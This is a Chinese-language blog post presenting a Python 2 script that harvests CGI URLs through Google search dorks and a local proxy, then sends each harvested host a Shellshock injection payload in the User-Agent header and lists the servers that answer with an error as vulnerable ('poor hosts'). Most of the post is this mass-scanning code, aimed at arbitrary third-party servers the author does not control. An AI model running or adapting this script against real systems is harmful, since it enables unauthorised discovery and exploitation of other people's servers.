Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

Bash远程代码执行漏洞的威力确实要比心脏滴血大很多，但是影响范围不是很广泛，不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术，这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理，端口是8087。如何检测漏洞思路也很简单，我这里直接根据服务器返回码进行判断的。

思路就是以上这些，下面还是和往常一样，贴代码：

    #coding=utf-8        import requests        import json        import sys        import threading        import socket        vul_res = []        class GoogleURLProvider():            def __init__(self,pageCount,proxies):                self.pageCount = pageCount #查询的页数                self.keywords = r'inurl:cgi-bin filetype:sh'                self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"                self.proxies = proxies            def getRequest(self,url):                return requests.get(url,proxies=self.proxies,verify=False)                    def getUrls(self):                ret_list = []                tmp_list = []                for x in xrange(0,self.pageCount):                    url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)                    try:                        r = self.getRequest(url)                            results = json.loads(r.text)                        if not results:                            continue                        infos = results['responseData']['results']                        if infos:                            for i in infos:                                tmp_list.append(i['url'])                    except Exception, e:                        continue                ret_list = ret_list + tmp_list                return ret_list                class BashRCEDetector():            def __init__(self,urls):                        self.urls = urls            def detector(self):                global vul_res                                for x in self.urls:                    #多线程执行                    each = EachWorker(x)                    each.start()                    each.join()                        '''''线程工作类'''        class EachWorker(threading.Thread):            def __init__(self,url):                threading.Thread.__init__(self)                self.url = url            def run(self):                global vul_res                useragent_header = {                    'User-Agent':'''''() { 1;}; echo 'eee'''                }                try:                    r = requests.get(self.url,headers = useragent_header,timeout=8)                    if r.status_code == 500:                        print "{url} has Bash RCE vulnerability".format(url=self.url)                        vul_res.append(self.url)                    else:                        pass                except socket.timeout, e:                    pass                except requests.exceptions.Timeout, e:                    pass                except requests.exceptions.ConnectionError, e:                    pass                        if __name__ == '__main__':            print 'Powered by:Exploit QQ:739858341'            print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'            if len(sys.argv) != 2:                print 'Usage:python BashRCEScanner <google pageCount>'                sys.exit()            #goagent proxy            #在这里修改，加入你自己的代理即可使用            proxies = {            'http':"http://127.0.0.1:8087",            'https':"http://127.0.0.1:8087"            }            url_res = []            vul_guys = []            urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)            url_res = urlgetter.getUrls()                    bash_detector = BashRCEDetector(url_res)            bash_detector.detector()            if len(vul_res) == 0:                print 'This group have no vulnerability'            else:                print 'Find %d poor host(s)' % len(vul_res)   

运行截图：